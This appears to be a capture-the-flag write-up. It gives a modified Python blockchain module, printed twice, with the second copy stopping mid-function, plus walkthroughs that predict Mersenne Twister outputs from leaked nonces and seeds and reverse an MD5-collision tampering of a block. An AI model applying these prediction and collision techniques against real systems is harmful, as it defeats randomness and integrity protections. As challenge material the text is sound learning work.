The below zip file contains the changed naughty_nice.py (please remove the .txt after extraction)

naughty_nice.py

#!/usr/bin/env python3
'''
So, you want to work with the naughty/nice blockchain?

Welcome!  

This python module is your first step in that process. It will introduce you to how the Naughty/Nice
blockchain is structured and how we at the North Pole use blockchain technology. The North Pole
has been using blockchain technology since Santa first invented it back in the 1960's. (Jolly
prankster that he is, Santa posted a white paper on the Internet that he wrote under a pseudonym
describing a non-Naughty/Nice application of blockchains a dozen or so years back. It caused quite
a stir...)

Important note: This module will NOT allow you to add content to the Official Naughty/Nice Blockchain!
That can only be done through the Official Naughty/Nice Website, which passes new blocks to the Official
Santa Signature System (OS3) that applies a digital signature to the content of each block before it is
added to the chain. Only blocks whose contents have been digitally signed by that system are placed on
the Naughty/Nice blockchain.

Note: If you're authorized to use the Official Naughty/Nice website, you will have been given a login and
password for that site after completing your training as a part of Elf University's "Assessing and
Evaluating Human Behavior for Naughty/Niceness" Curriculum.

This code is used to introduce how blocks/chains are created and allow you to view and/or validate 
portions (or the entirety) of the Official Naughty/Nice Blockchain.

A blockchain, while a part of the whole cryptocurrency "fad" that a certain pseudonym-packing North Pole
resident appears to have begun, are certainly not limited to that use. A blockchain can be used anywhere
that a record of information or transactions need to be maintained in a way that cannot be altered. And
really, what information is more important (and necessarily unalterable) than acts of Naughty/Niceness?

A blockchain works by linking each record together with the previous record. Each block's data contains
a cryptographic hash of the previous block's data. Because a block cannot be altered without altering
the cryptographic hash of its contents, any alteration of the data within a block will be immediately
evident, because every following block will no longer be valid.

In addition to this built-in property of a blockchain, the Official Naughty/Nice Blockchain has a few
other safeguards. The cryptographic hash of each block is signed using the Official Santa Signature
System (OS3). Currently, the Official Naughty/Nice Blockchain uses MD5 as its hashing algorithm, but
plans are in place to move to SHA256 in 2021. This update is part of a phased process to modernize
the blockchain code. In 2019, the entire blockchain system was ported from the original COBOL code to
Python3. Because of concerns about hash collisions in MD5, in the new Python3 code, a 64-bit random 
"nonce" was added to the beginning of each block at the time of creation.

This module represents a portion of the most current blockchain codebase. It consists of two classes,
one for the creation of blocks, called Block(), and one for the creation, examination, and verification of
chains of blocks, called Chain(). 

The following is an overview of the functionality provided by these classes:

The Chain() class is where most blockchain work is performed. It is designed to be as "block-agnostic"
as possible, so it can be used with blocks that hold different types of data. To use a different type
of block, you simply replace (or subclass) the Block() class. For this to work, there are several
functions that MUST be supplied by the Block() class. Let's take a look at those.

The Block() class MUST supply the following functions, used by the Chain() class:

    create_genesis_block() - This creates a very special block used at the beginning of the blockchain,
    and known as the "genesis" block. Because it has no previous block to reference it is, by definition,
    always considered valid. This block uses an agreed-upon, fake previous hash value.

    verify_types() - Because the Chain() class is block-agnostic, it needs the Block() class to validate
    that a block contains valid data. This function returns True or False.

    block_data() - a function that returns a representation of all of the data in the block that is to
    be hashed and signed. The data is returned as a Python3 bytes object.

    full_block_data() - a function that returns a representation of the entire block, including any
    hashes and signatures. A hash of this data is what is used as the "previous hash" value in the
    subsequent block. This data is returned as a Python3 bytes object. This function is also used
    when saving either the entire blockchain to a file, or a single block to a file

    load_a_block([filehandle]) - this function takes a filehandle and returns a block at a time for
    addition to the block chain. This function DOES NOT verify blocks. This function throws a
    Value_Error exception when it either encounters the end of the file or unparsable data.

The Naughty/Nice Block() class also defines a utility function:

    dump_doc([document number]) - this will dump the indicated supporting document to a file named
    as <block_index>.<data_type_extension>. Note: this function will overwrite any existing file 
    with that name, so if there are multiple documents (there can be up to 9) of the same type 
    affixed to a record, it is the responsibility of the calling process to rename them as appropriate.

The Chain() class provides the following functions:

    add_block([block_data]) - passes a block_data dictionary to the Block() initialization code.
    This function, being "block-agnostic" simply passes the block_data along. It is up to the Block()
    initialization code to validate this data.

    verify_chain([public_key], <beginning hash>) - steps through every block in the chain and
    verifies that the data in each block is of the correct type, that the block index is correct,
    that the block contains the correct hash for the previous block, and that the block signature
    is a valid signature based on the hash of the block data. It then hashes the full block for use
    as the "previous hash" on the next block. This returns True or False. (If False, it prints
    information about what, specific, issues were found and the block that triggered the issue.)
    Note: If you're working with a portion of the block chain that does not begin with a genesis
    block, you'll need to provide a value for the previous block's hash for this function to
    work.

    save_a_block(index, <filename>) - saves the block at index to the filename provided, or to 
    "block.dat" if no filename is given.

    save_chain(<filename>) - saves the chain to the filename provided, or to "blockchain.dat" if
    no filename is given.

    load_chain(<filename>) - loads a chain from the filename provided, or from "blockchain.dat" if
    no filename is given. This returns the count of blocks loaded. This DOES NOT verify that the
    data loaded is a valid blockchain. It is recommended to call verify_chain() immediately after
    loading a new chain.   

An overview of how we process the Official Naughty/Nice Blockchain:

There are approximately 7.8 billion people and magical beings on Earth, and each one is tracked
24 hours a day throughout the year by a fleet of Elves-On-The-Shelves. While those elves are
clearly visible during the Holiday season, don't be fooled into believing that we're only tracking
Naughty/Niceness at that time. On average, each of the billions of subjects that we monitor are
performing some sort of Naughty or Nice activity that rises to the level of being scored on the
blockchain around 2.1 times per week. Keeping track of all of that activity on a single blockchain
would be incredibly processing intensive (that would be ~1^12 blocks/year, or 32,000 blocks/second),
so we've broken our record-keeping into 1,000 different blockchains. If you do the math, you'll find
that each of the blockchains is now responsible for between 1,500 and 2000 blocks per minute, which
is a reasonable load. A separate database keeps track of which Personal ID (pid) is assigned to each
of the blockchains.

Throughout the year, we periodically run each of the chains to determine who is the best (and worst)
of our subjects. While only the final Holiday run is used to determine who is getting something
good in their stockings and who is getting a lump of coal, it's always interesting to see a listing
of the Nicest and Naughtiest folks out there. 

Please note: Wagering on the results of the Official Naughty/Nice Blockchain is STRICTLY PROHIBITED.

If you intend to use your access to the Official Naughty/Nice Blockchain code to facilitate any sort
of gambling, you will be racking up a whole bunch of Naughtiness points. YOU HAVE BEEN WARNED! (I'm
looking at you, Alabaster Snowball...)

For this reason, we have not provided any code that will perform a computation of Naughty/Nice
points. Additionally, for privacy reasons, there is also no code to pull the records associated
with specific individuals from this list. While the creation of that code would not be difficult,
you are honor-bound to use your access to this list for only good and noble purposes.

Signing Keys - Information

We have provided you with an example private key that you can use when generating your own blockchains
for test purposes. This private key (which also contains the public key information) is called 
private.pem.

Additionally, we have provided you with a copy of the public key used to verify the Official
Naughty/Nice Blockchain. This is the public key component of the private key used by the Official
Santa Signature System (OS3) to sign blocks on the Official Naughty/Nice Blockchain. This key
is contained in the file official_public.pem.
'''

import random
from Crypto.Hash import MD5, SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from base64 import b64encode, b64decode
import binascii
import time
import itertools
from mt19937predictor import MT19937Predictor

genesis_block_fake_hash = '00000000000000000000000000000000'

data_types = {1:'plaintext', 2:'jpeg image', 3:'bmp image', 4:'gif image', 5:'PDF', 6:'Word', 7:'PowerPoint', 8:'Excel', 9:'tiff image', 10:'MP4 video', 11:'MOV video', 12:'WMV video', 13:'FLV video', 14:'AVI video', 255:'Binary blob'}
data_extension = {1:'txt', 2:'jpg', 3:'bmp', 4:'gif', 5:'pdf', 6:'docx', 7:'pptx', 8:'xlsx', 9:'tiff', 10:'mp4', 11:'mov', 12:'wmv', 13:'flv', 14:'avi', 255:'bin'}

Naughty = 0
Nice = 1

class Block():
    def __init__(self, index=None, block_data=None, previous_hash=None, load=False, genesis=False):
        if(genesis == True):
            return None
        else:
            self.data = []
            if(load == False):
                if all(p is not None for p in [index, block_data['documents'], block_data['pid'], block_data['rid'], block_data['score'], block_data['sign'], previous_hash]):
                    self.index = index
                    if self.index == 0:
                        self.nonce = 0 # genesis block
                    else:
                        self.nonce = random.randrange(0xFFFFFFFFFFFFFFFF)
                    self.data = block_data['documents']
                    self.previous_hash = previous_hash
                    self.doc_count = len(self.data)
                    self.pid = block_data['pid']
                    self.rid = block_data['rid']
                    self.score = block_data['score']
                    self.sign = block_data['sign']
                    now = time.gmtime()
                    self.month = now.tm_mon
                    self.day = now.tm_mday
                    self.hour = now.tm_hour
                    self.minute = now.tm_min
                    self.second = now.tm_sec
                    self.hash, self.sig = self.hash_n_sign()
                else:
                    return None

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def __repr__(self):
        s = 'Chain Index: %i\n' % (self.index)
        s += '              Nonce: %s\n' % ('%016.016x' % (self.nonce))
        s += '                PID: %s\n' % ('%016.016x' % (self.pid))
        s += '                RID: %s\n' % ('%016.016x' % (self.rid))
        s += '     Document Count: %1.1i\n' % (self.doc_count)
        s += '              Score: %s\n' % ('%08.08x (%i)' % (self.score, self.score))
        n_n = 'Naughty'
        if self.sign > 0:
            n_n = 'Nice'
        s += '               Sign: %1.1i (%s)\n' % (self.sign, n_n)
        c = 1
        for d in self.data:
            s += '         Data item: %i\n' % (c)
            s += '               Data Type: %s (%s)\n' % ('%02.02x' % (d['type']), data_types[d['type']])
            s += '             Data Length: %s\n' % ('%08.08x' % (d['length']))
            s += '                    Data: %s\n' % (binascii.hexlify(d['data']))
            c += 1
        s += '               Date: %s/%s\n' % ('%02.02i' % (self.month), '%02.02i' % (self.day))
        s += '               Time: %s:%s:%s\n' % ('%02.02i' % (self.hour), '%02.02i' % (self.minute), '%02.02i' % (self.second))
        s += '       PreviousHash: %s\n' % (self.previous_hash)
        s += '  Data Hash to Sign: %s\n' % (self.hash)
        s += '          Signature: %s\n' % (self.sig)
        return(s)

    def full_hash(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data_signed())
        return hash_obj.hexdigest()

    def hash_n_sign(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data())
        signer = PKCS1_v1_5.new(private_key)
        return (hash_obj.hexdigest(), b64encode(signer.sign(hash_obj)))

    def block_data(self):
        s = (str('%016.016x' % (self.index)).encode('utf-8'))
        s += (str('%016.016x' % (self.nonce)).encode('utf-8'))
        s += (str('%016.016x' % (self.pid)).encode('utf-8'))
        s += (str('%016.016x' % (self.rid)).encode('utf-8'))
        s += (str('%1.1i' % (self.doc_count)).encode('utf-8'))
        s += (str(('%08.08x' % (self.score))).encode('utf-8'))
        s += (str('%1.1i' % (self.sign)).encode('utf-8'))
        for d in self.data:
            s += (str('%02.02x' % d['type']).encode('utf-8'))
            s += (str('%08.08x' % d['length']).encode('utf-8'))
            s += d['data']
        s += (str('%02.02i' % (self.month)).encode('utf-8'))
        s += (str('%02.02i' % (self.day)).encode('utf-8'))
        s += (str('%02.02i' % (self.hour)).encode('utf-8'))
        s += (str('%02.02i' % (self.minute)).encode('utf-8'))
        s += (str('%02.02i' % (self.second)).encode('utf-8'))
        s += (str(self.previous_hash).encode('utf-8'))
        return(s)

    def block_data_signed(self):
        s = self.block_data()
        s += bytes(self.hash.encode('utf-8'))
        s += self.sig
        return(s)

    def load_a_block(self, fh):
        self.index = int(fh.read(16), 16)
        self.nonce = int(fh.read(16), 16)
        self.pid = int(fh.read(16), 16)
        self.rid = int(fh.read(16), 16)
        self.doc_count = int(fh.read(1), 10)
        self.score = int(fh.read(8), 16)
        self.sign = int(fh.read(1), 10)
        count = self.doc_count
        while(count > 0):
            l_data = {}
            l_data['type'] = int(fh.read(2),16)
            l_data['length'] = int(fh.read(8), 16)
            l_data['data'] = fh.read(l_data['length'])
            self.data.append(l_data)
            count -= 1
        self.month = int(fh.read(2))
        self.day = int(fh.read(2))
        self.hour = int(fh.read(2))
        self.minute = int(fh.read(2))
        self.second = int(fh.read(2))
        self.previous_hash = str(fh.read(32))[2:-1]
        self.hash = str(fh.read(32))[2:-1]
        self.sig = fh.read(344)
        return self

    def create_genesis_block(self):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes('Genesis Block'.encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 0
        block_data['rid'] = 0
        block_data['score'] = 0
        block_data['sign'] = Nice
        b = Block(0, block_data, genesis_block_fake_hash)
        return b

    def verify_types(self):  # check data types of all info in a block
        rv = True
        instances = [self.index, self.nonce, self.pid, self.rid, self.month, self.day, self.hour, self.minute, self.second, self.previous_hash, self.score, self.sign]
        types = [int, int, int, int, int, int, int, int, int, str, int, int]
        if not sum(map(lambda inst_, type_: isinstance(inst_, type_), instances, types)) == len(instances):
            rv = False
        for d in self.data:
            if not isinstance(d['type'], int):
                rv = False
            if not isinstance(d['length'], int):
                rv = False
            if not isinstance(d['data'], bytes):
                rv = False
        return rv

    def dump_doc(self, doc_no):
        filename = '%s.%s' % (str(self.index), data_extension[self.data[doc_no - 1]['type']])
        with open(filename, 'wb') as fh:
            d = self.data[doc_no - 1]['data']
            fh.write(d)
        print('Document dumped as: %s' % (filename))


class Chain():
    nonce_list = [] 
    index = 0
    initial_index = 0
    last_hash_value = ''
    def __init__(self, load=False, filename=None):
        if not load:
            self.blocks = [Block(genesis=True).create_genesis_block()]
            self.last_hash_value = self.blocks[0].full_hash()
        else:
            self.blocks = []
            self.load_chain(filename)
            self.index = self.blocks[-1].index
            self.initial_index = self.blocks[0].index

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def add_block(self, block_data):
        self.index += 1
        b = Block(self.index, block_data, self.last_hash_value)
        self.blocks.append(b)
        self.last_hash_value = b.full_hash() 

    def verify_chain(self, publickey, previous_hash=None):
        flag = True
        # unless we're explicitly told what the initial last hash should be, we assume that
        # the initial block will be the genesis block and will have a fixed previous_hash
        if previous_hash is None:
            previous_hash = genesis_block_fake_hash
        for i in range(0, len(self.blocks)):  # assume Genesis block integrity
            block_no = self.blocks[i].index
            if not self.blocks[i].verify_types():
                flag = False
                print(f'\n*** WARNING *** Wrong data type(s) at block {block_no}.')
            if self.blocks[i].index != i + self.initial_index:
                flag = False
                print(f'\n*** WARNING *** Wrong block index at what should be block {i + self.initial_index}: {block_no}.')
            if self.blocks[i].previous_hash != previous_hash:
                flag = False
                print(f'\n*** WARNING *** Wrong previous hash at block {block_no}.')
            hash_obj = MD5.new()
            hash_obj.update(self.blocks[i].block_data())
            signer = PKCS1_v1_5.new(publickey)
            if signer.verify(hash_obj, b64decode(self.blocks[i].sig)) is False:
                flag = False
                print(f'\n*** WARNING *** Bad signature at block {block_no}.')
            if flag == False:
                print(f'\n*** WARNING *** Blockchain invalid from block {block_no} onward.\n')
                return False
            previous_hash = self.blocks[i].full_hash()
        return True

    def save_a_block(self, index, filename=None):
        if filename is None:
            filename = 'block.dat'
        with open(filename, 'wb') as fh:
            fh.write(self.blocks[index].block_data_signed())

    def save_chain(self, filename=None):
        if filename is None:
            filname = 'blockchain.dat'
        with open(filename, 'wb') as fh:
            i = 0
            while(i < len(self.blocks)):
                fh.write(self.blocks[i].block_data_signed())
                i += 1

    def load_chain(self, filename=None):
        count = 0
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'rb') as fh:
            while(1):
                try:
                    self.blocks.append(Block(load=True).load_a_block(fh))
                    self.index = self.blocks[-1].index
                    count += 1
                except ValueError:
                    return count

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    for i in range(9):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes(('This is block %i of the naughty/nice blockchain.' % (i)).encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 123 # this is the pid, or "person id," that the block is about
        block_data['rid'] = 456 # this is the rid, or "reporter id," of the reporting elf
        block_data['score'] = 100 # this is the Naughty/Nice score of the report
        block_data['sign'] = Nice # this indicates whether the report is about naughty or nice behavior
        c1.add_block(block_data)
    print(c1.blocks[3])
    print('C1: Block chain verify: %s' % (c1.verify_chain(public_key)))

#Note: This is how you would load and verify a blockchain contained in a file called blockchain.dat
#
    with open('official_public.pem', 'rb') as fh:
        official_public_key = RSA.importKey(fh.read())
    c2 = Chain(load=True, filename='blockchain.dat')
    print('C2: Block chain verify: %s' % (c2.verify_chain(official_public_key)))
    print(c2.blocks[0])
    c2.blocks[0].dump_doc(1)


    predictor = MT19937Predictor()
    nonce_list= []
    # Adding all the nonces of all the blocks in a list
    for i in range(len(c2.blocks)):
         nonce_list.append(c2.blocks[i].nonce)
 
    # reeversing the list
    nonce_list.reverse()
    # get the first 625 nonces
    last_625_block_nonce = list(itertools.islice(nonce_list,625))
    # reverse the list so we get the last 625 nonces
    last_625_block_nonce.reverse()

   # Setting the data for 625 nonces to the MT19937Predictor
    for nonce in last_625_block_nonce:
        predictor.setrandbits(nonce, 64)

    # calcutated nonce and added for block 12997 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(13205885317093879758,64)
    # calculated nonce and added for block 12998 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(109892600914328301,64)
    # calculated nonce and added for block 12999 [lietarally ran the code at this point to get the nonce for block 12997 using predictor.getrandbits()]
    predictor.setrandbits(9533956617156166628,64)
    # Get the nonce for block 13000
    print(predictor.getrandbits(64))

The snowball fight :

We need to solve this challenge to get more hints for objective 11b)
Welcome to Snowball Fight! You and an opponent each have five snow forts, but you can’t see the others’ layout. Start lobbing snowballs back and forth. Be the first to hit everything on your opponent’s side!
Note: On easier levels, you may pick your own name. On the Hard and Impossible level, we will pick for you. That’s just how things work around here!
What’s more, on Impossible, we won’t even SHOW you your name! In fact, just to make sure things are super random, we’ll throw away hundreds of random names before starting!

High level Approach :

  1. Open the “Impossible” game.
  2. In the impossible, get seeds, predict seed. See below (“How to get the random seeds and calculate the next seed”).
  3. Open the game in a new window https://snowball2.kringlecastle.com/.
  4. In this window, open the “easy” game and use the seed predicted in step 2).
  5. Win the easy game. Record the moves.
  6. Go back to the “impossible” window and use the same moves.
  7. Win the ‘Impossible’ game.

Process details :

You will see a number of seeds in the below URL response
https://snowball2.kringlecastle.com/game
They are exactly 624 seeds indicating the next seed could be predicted using the Mersenne Twister algorithm.
So, we can use the python script M19937 to predict the next seed.

624 seeds in view source

Keep all the 624 seeds in the data.txt.

Create a new bash script “predict-next-seed.sh” which would take the data in the data.txt, apply mt19937 on it and predict next set of numbers in predicted.txt

#!/bin/bash
cat data.txt | mt19937predict > predicted.txt

Run the bash script for a very small time (0.1 sec).

timeout 0.1s ./predict-next-seed.sh

The first entry in the output predicted.txt is the next seed.

The predicted next seed after 624 seeds is 476691297

Login using the username 476691297 in an easy game.
Win the easy game. Record the moves.

Use the same moves made in the easy window in the impossible window.

New hints unlocked!!

Objective 11b): Naughty/Nice List with Blockchain Investigation Part 2

Answer: fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

High level approach :

  1. Change naughty_nice.py:
    • Get Jake’s Block from the chain and save it as a binary (block.dat)
    • Extract all the docs from the Jake’s block
  2. Determine and extract the original naughty document.
    This is the document Jake modified to put nice list on it. – This would be the 1st byte on the Jake’s block which he changed.
    ref: https://speakerdeck.com/ange/colltris?slide=194
  3. Determine the flag for naughty/nice.
    This is the flag which Jake changed from naughty to nice – this would-be 2nd byte on the Jake’s block which he changed.
  4. Determine 3rd and 4th byte which were changed by Jake
    ref: https://speakerdeck.com/ange/colltris?slide=109
  5. Make changes on 1st, 2nd, 3rd and 4th byte on Jake’s block making sure the MD5 hash does not change
  6. Save the original block restored from Jack’s block and save as block_restored.dat file.
  7. Calculate the SHA256 of the blockchain_restored.dat.

Process :

Changes to naughty_nice.py:

Added a function named full_hash_SHA256() which will calculate the SHA256 hash of the block. Screenshot 1 below.
Added code to calculate the SHA256 hash for each block and If Its equal to the 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f, it saves the block to a new file named block.dat.
It also extracts all the documents from the Jack’s block – 129459.pdf and 129459.bin Screenshot 2 below.

Screenshot 1
Screenshot 2

The whole naughty_nice.py

#!/usr/bin/env python3
'''
So, you want to work with the naughty/nice blockchain?

Welcome!  

This python module is your first step in that process. It will introduce you to how the Naughty/Nice
blockchain is structured and how we at the North Pole use blockchain technology. The North Pole
has been using blockchain technology since Santa first invented it back in the 1960's. (Jolly
prankster that he is, Santa posted a white paper on the Internet that he wrote under a pseudonym
describing a non-Naughty/Nice application of blockchains a dozen or so years back. It caused quite
a stir...)

Important note: This module will NOT allow you to add content to the Official Naughty/Nice Blockchain!
That can only be done through the Official Naughty/Nice Website, which passes new blocks to the Official
Santa Signature System (OS3) that applies a digital signature to the content of each block before it is
added to the chain. Only blocks whose contents have been digitally signed by that system are placed on
the Naughty/Nice blockchain.

Note: If you're authorized to use the Official Naughty/Nice website, you will have been given a login and
password for that site after completing your training as a part of Elf University's "Assessing and
Evaluating Human Behavior for Naughty/Niceness" Curriculum.

This code is used to introduce how blocks/chains are created and allow you to view and/or validate 
portions (or the entirety) of the Official Naughty/Nice Blockchain.

A blockchain, while a part of the whole cryptocurrency "fad" that a certain pseudonym-packing North Pole
resident appears to have begun, are certainly not limited to that use. A blockchain can be used anywhere
that a record of information or transactions need to be maintained in a way that cannot be altered. And
really, what information is more important (and necessarily unalterable) than acts of Naughty/Niceness?

A blockchain works by linking each record together with the previous record. Each block's data contains
a cryptographic hash of the previous block's data. Because a block cannot be altered without altering
the cryptographic hash of its contents, any alteration of the data within a block will be immediately
evident, because every following block will no longer be valid.

In addition to this built-in property of a blockchain, the Official Naughty/Nice Blockchain has a few
other safeguards. The cryptographic hash of each block is signed using the Official Santa Signature
System (OS3). Currently, the Official Naughty/Nice Blockchain uses MD5 as its hashing algorithm, but
plans are in place to move to SHA256 in 2021. This update is part of a phased process to modernize
the blockchain code. In 2019, the entire blockchain system was ported from the original COBOL code to
Python3. Because of concerns about hash collisions in MD5, in the new Python3 code, a 64-bit random 
"nonce" was added to the beginning of each block at the time of creation.

This module represents a portion of the most current blockchain codebase. It consists of two classes,
one for the creation of blocks, called Block(), and one for the creation, examination, and verification of
chains of blocks, called Chain(). 

The following is an overview of the functionality provided by these classes:

The Chain() class is where most blockchain work is performed. It is designed to be as "block-agnostic"
as possible, so it can be used with blocks that hold different types of data. To use a different type
of block, you simply replace (or subclass) the Block() class. For this to work, there are several
functions that MUST be supplied by the Block() class. Let's take a look at those.

The Block() class MUST supply the following functions, used by the Chain() class:

    create_genesis_block() - This creates a very special block used at the beginning of the blockchain,
    and known as the "genesis" block. Because it has no previous block to reference it is, by definition,
    always considered valid. This block uses an agreed-upon, fake previous hash value.

    verify_types() - Because the Chain() class is block-agnostic, it needs the Block() class to validate
    that a block contains valid data. This function returns True or False.

    block_data() - a function that returns a representation of all of the data in the block that is to
    be hashed and signed. The data is returned as a Python3 bytes object.

    full_block_data() - a function that returns a representation of the entire block, including any
    hashes and signatures. A hash of this data is what is used as the "previous hash" value in the
    subsequent block. This data is returned as a Python3 bytes object. This function is also used
    when saving either the entire blockchain to a file, or a single block to a file

    load_a_block([filehandle]) - this function takes a filehandle and returns a block at a time for
    addition to the block chain. This function DOES NOT verify blocks. This function throws a
    Value_Error exception when it either encounters the end of the file or unparsable data.

The Naughty/Nice Block() class also defines a utility function:

    dump_doc([document number]) - this will dump the indicated supporting document to a file named
    as <block_index>.<data_type_extension>. Note: this function will overwrite any existing file 
    with that name, so if there are multiple documents (there can be up to 9) of the same type 
    affixed to a record, it is the responsibility of the calling process to rename them as appropriate.

The Chain() class provides the following functions:

    add_block([block_data]) - passes a block_data dictionary to the Block() initialization code.
    This function, being "block-agnostic" simply passes the block_data along. It is up to the Block()
    initialization code to validate this data.

    verify_chain([public_key], <beginning hash>) - steps through every block in the chain and
    verifies that the data in each block is of the correct type, that the block index is correct,
    that the block contains the correct hash for the previous block, and that the block signature
    is a valid signature based on the hash of the block data. It then hashes the full block for use
    as the "previous hash" on the next block. This returns True or False. (If False, it prints
    information about what, specific, issues were found and the block that triggered the issue.)
    Note: If you're working with a portion of the block chain that does not begin with a genesis
    block, you'll need to provide a value for the previous block's hash for this function to
    work.

    save_a_block(index, <filename>) - saves the block at index to the filename provided, or to 
    "block.dat" if no filename is given.

    save_chain(<filename>) - saves the chain to the filename provided, or to "blockchain.dat" if
    no filename is given.

    load_chain(<filename>) - loads a chain from the filename provided, or from "blockchain.dat" if
    no filename is given. This returns the count of blocks loaded. This DOES NOT verify that the
    data loaded is a valid blockchain. It is recommended to call verify_chain() immediately after
    loading a new chain.   

An overview of how we process the Official Naughty/Nice Blockchain:

There are approximately 7.8 billion people and magical beings on Earth, and each one is tracked
24 hours a day throughout the year by a fleet of Elves-On-The-Shelves. While those elves are
clearly visible during the Holiday season, don't be fooled into believing that we're only tracking
Naughty/Niceness at that time. On average, each of the billions of subjects that we monitor are
performing some sort of Naughty or Nice activity that rises to the level of being scored on the
blockchain around 2.1 times per week. Keeping track of all of that activity on a single blockchain
would be incredibly processing intensive (that would be ~1^12 blocks/year, or 32,000 blocks/second),
so we've broken our record-keeping into 1,000 different blockchains. If you do the math, you'll find
that each of the blockchains is now responsible for between 1,500 and 2000 blocks per minute, which
is a reasonable load. A separate database keeps track of which Personal ID (pid) is assigned to each
of the blockchains.

Throughout the year, we periodically run each of the chains to determine who is the best (and worst)
of our subjects. While only the final Holiday run is used to determine who is getting something
good in their stockings and who is getting a lump of coal, it's always interesting to see a listing
of the Nicest and Naughtiest folks out there. 

Please note: Wagering on the results of the Official Naughty/Nice Blockchain is STRICTLY PROHIBITED.

If you intend to use your access to the Official Naughty/Nice Blockchain code to facilitate any sort
of gambling, you will be racking up a whole bunch of Naughtiness points. YOU HAVE BEEN WARNED! (I'm
looking at you, Alabaster Snowball...)

For this reason, we have not provided any code that will perform a computation of Naughty/Nice
points. Additionally, for privacy reasons, there is also no code to pull the records associated
with specific individuals from this list. While the creation of that code would not be difficult,
you are honor-bound to use your access to this list for only good and noble purposes.

Signing Keys - Information

We have provided you with an example private key that you can use when generating your own blockchains
for test purposes. This private key (which also contains the public key information) is called 
private.pem.

Additionally, we have provided you with a copy of the public key used to verify the Official
Naughty/Nice Blockchain. This is the public key component of the private key used by the Official
Santa Signature System (OS3) to sign blocks on the Official Naughty/Nice Blockchain. This key
is contained in the file official_public.pem.
'''

import random
from Crypto.Hash import MD5, SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from base64 import b64encode, b64decode
import binascii
import time
import itertools
from mt19937predictor import MT19937Predictor

genesis_block_fake_hash = '00000000000000000000000000000000'

data_types = {1:'plaintext', 2:'jpeg image', 3:'bmp image', 4:'gif image', 5:'PDF', 6:'Word', 7:'PowerPoint', 8:'Excel', 9:'tiff image', 10:'MP4 video', 11:'MOV video', 12:'WMV video', 13:'FLV video', 14:'AVI video', 255:'Binary blob'}
data_extension = {1:'txt', 2:'jpg', 3:'bmp', 4:'gif', 5:'pdf', 6:'docx', 7:'pptx', 8:'xlsx', 9:'tiff', 10:'mp4', 11:'mov', 12:'wmv', 13:'flv', 14:'avi', 255:'bin'}

Naughty = 0
Nice = 1

class Block():
    def __init__(self, index=None, block_data=None, previous_hash=None, load=False, genesis=False):
        if(genesis == True):
            return None
        else:
            self.data = []
            if(load == False):
                if all(p is not None for p in [index, block_data['documents'], block_data['pid'], block_data['rid'], block_data['score'], block_data['sign'], previous_hash]):
                    self.index = index
                    if self.index == 0:
                        self.nonce = 0 # genesis block
                    else:
                        self.nonce = random.randrange(0xFFFFFFFFFFFFFFFF)
                    self.data = block_data['documents']
                    self.previous_hash = previous_hash
                    self.doc_count = len(self.data)
                    self.pid = block_data['pid']
                    self.rid = block_data['rid']
                    self.score = block_data['score']
                    self.sign = block_data['sign']
                    now = time.gmtime()
                    self.month = now.tm_mon
                    self.day = now.tm_mday
                    self.hour = now.tm_hour
                    self.minute = now.tm_min
                    self.second = now.tm_sec
                    self.hash, self.sig = self.hash_n_sign()
                else:
                    return None

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def __repr__(self):
        s = 'Chain Index: %i\n' % (self.index)
        s += '              Nonce: %s\n' % ('%016.016x' % (self.nonce))
        s += '                PID: %s\n' % ('%016.016x' % (self.pid))
        s += '                RID: %s\n' % ('%016.016x' % (self.rid))
        s += '     Document Count: %1.1i\n' % (self.doc_count)
        s += '              Score: %s\n' % ('%08.08x (%i)' % (self.score, self.score))
        n_n = 'Naughty'
        if self.sign > 0:
            n_n = 'Nice'
        s += '               Sign: %1.1i (%s)\n' % (self.sign, n_n)
        c = 1
        for d in self.data:
            s += '         Data item: %i\n' % (c)
            s += '               Data Type: %s (%s)\n' % ('%02.02x' % (d['type']), data_types[d['type']])
            s += '             Data Length: %s\n' % ('%08.08x' % (d['length']))
            s += '                    Data: %s\n' % (binascii.hexlify(d['data']))
            c += 1
        s += '               Date: %s/%s\n' % ('%02.02i' % (self.month), '%02.02i' % (self.day))
        s += '               Time: %s:%s:%s\n' % ('%02.02i' % (self.hour), '%02.02i' % (self.minute), '%02.02i' % (self.second))
        s += '       PreviousHash: %s\n' % (self.previous_hash)
        s += '  Data Hash to Sign: %s\n' % (self.hash)
        s += '          Signature: %s\n' % (self.sig)
        return(s)

    def full_hash(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data_signed())
        return hash_obj.hexdigest()

    def hash_n_sign(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data())
        signer = PKCS1_v1_5.new(private_key)
        return (hash_obj.hexdigest(), b64encode(signer.sign(hash_obj)))

    def block_data(self):
        s = (str('%016.016x' % (self.index)).encode('utf-8'))
        s += (str('%016.016x' % (self.nonce)).encode('utf-8'))
        s += (str('%016.016x' % (self.pid)).encode('utf-8'))
        s += (str('%016.016x' % (self.rid)).encode('utf-8'))
        s += (str('%1.1i' % (self.doc_count)).encode('utf-8'))
        s += (str(('%08.08x' % (self.score))).encode('utf-8'))
        s += (str('%1.1i' % (self.sign)).encode('utf-8'))
